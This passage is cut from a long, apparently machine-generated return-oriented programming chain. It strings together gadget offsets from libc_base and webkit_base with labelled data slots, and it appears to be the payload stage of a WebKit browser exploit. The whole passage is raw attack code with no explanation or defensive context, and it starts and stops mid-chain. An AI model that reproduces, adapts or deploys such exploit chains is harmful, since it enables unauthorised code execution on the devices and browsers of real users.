set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+543808, //L12011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L12011: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12012: db([37, 0]); // 0x25 set_gadget(libc_base+144605,); //pop rdi //L12013: db([37, 0]); // 0x25 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+543936, 
//L12015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+543920, //L12014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12015: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+544016, //L12016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12016: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12018: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+544136, //L12021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+544120, //L12019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12019: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12021: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+544216, //L12023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+544248, //L12025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12023: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L12024: ropchain+544376, //L12022 libc_base+144605 //pop rdi ]); //L12025: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+544352, //L12027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, 
//pop rsi ropchain+544368, //L12026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12027: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12026: db([0, 0]); // 0x0 //L12022: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+544448, //L12028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12028: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12030: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+544568, //L12033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+544552, //L12031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12031: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12033: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+544712, //L12036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+544680, //L12034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+544696, //L12035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12034: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12035: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12036: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+544800, //L12038 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+764760 //pop rsi ]); //L12037: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L12038: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+544856, //L12039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12039: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12041: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+544936, //L12043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12043: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+548864, //L10599 //L8577: libc_base+764760, //pop rsi ropchain+545032, //L12044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12044: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12046: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+545152, //L12049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+545136, //L12047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12047: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12049: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+545296, //L12052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+545264, //L12050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, 
//mov rax, rcx libc_base+764760, //pop rsi ropchain+545280, //L12051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12050: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12051: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12052: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+545376, //L12053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12053: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12055: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+545496, //L12058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+545480, //L12056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12056: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12058: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+545640, //L12061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+545608, //L12059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+545624, //L12060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12059: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12060: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12061: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 
libc_base+764760, //pop rsi ropchain+545728, //L12063 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12062: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L12063: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+545784, //L12064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12064: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12066: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+545864, //L12068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12068: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+545976, //L12069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12069: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12071: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+546096, //L12074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+546080, //L12072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12072: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12074: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+546240, //L12077 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+546208, //L12075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+546224, //L12076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12075: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12076: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12077: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+546320, //L12078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12078: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12080: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+546440, //L12083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+546424, //L12081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12081: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12083: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+546520, //L12084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+546536, //L12085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12084: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12085: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+546696, //L12089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, 
rdi libc_base+764760, //pop rsi ropchain+546664, //L12087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+546680, //L12088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12086: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L12087: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12088: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12089: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+546752, //L12091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12091: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+546880, //L12093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+546896, //L12094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+546864, //L12092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12092: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12093: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12094: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+547056, //L12098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+547024, //L12096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+547040, //L12097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12095: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L12096: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi 
//L12097: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12098: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+547112, //L12100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12100: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+547240, //L12102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+547256, //L12103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+547224, //L12101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12101: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12102: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12103: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+547416, //L12107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+547384, //L12105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+547400, //L12106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12104: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L12105: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12106: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12107: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+547472, //L12109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12109: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi 
ropchain+547600, //L12111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+547616, //L12112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+547584, //L12110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12110: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12111: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12112: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+547696, //L12113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+547712, //L12114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12113: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12114: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+547808, //L12116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+547792, //L12115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12115: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12116: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+547888, //L12117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12119: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+548008, //L12122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+547992, //L12120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12120: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12122: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+548088, //L12124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+548120, //L12126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12124: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L12125: ropchain+548248, //L12123 libc_base+144605 //pop rdi ]); //L12126: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+548224, //L12128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+548240, //L12127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12128: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12127: db([0, 0]); // 0x0 //L12123: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+548320, //L12129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12129: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12131: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+548440, //L12134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+548424, 
//L12132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12132: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12134: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+548584, //L12137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+548552, //L12135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+548568, //L12136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12135: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12136: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12137: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+548672, //L12139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12138: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L12139: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+548728, //L12140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12140: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12142: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+548808, //L12144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12144: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; 
mov rdx, rdi libc_base+782311, //pop rsp ropchain+548864, //L10599 //L10599: libc_base+782311, //pop rsp ropchain+548896, //L12145 //L6344: libc_base+782311, //pop rsp ropchain+548912, //L12146 //L12145: libc_base+782311, //pop rsp ropchain+318872, //L6308 //L12146: libc_base+764760, //pop rsi ropchain+548952, //L12147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12147: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12149: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+549072, //L12152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+549056, //L12150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12150: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12152: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+549216, //L12155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+549184, //L12153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+549200, //L12154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12153: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12154: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12155: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+549296, //L12156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12156: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi 
//L12158: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+549416, //L12161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+549400, //L12159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12159: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12161: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+549560, //L12164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+549528, //L12162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+549544, //L12163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12162: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12163: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+549640, //L12165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12165: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12167: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+549760, //L12170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+549744, //L12168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12168: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12170: db([0, 0]); // 0x0 
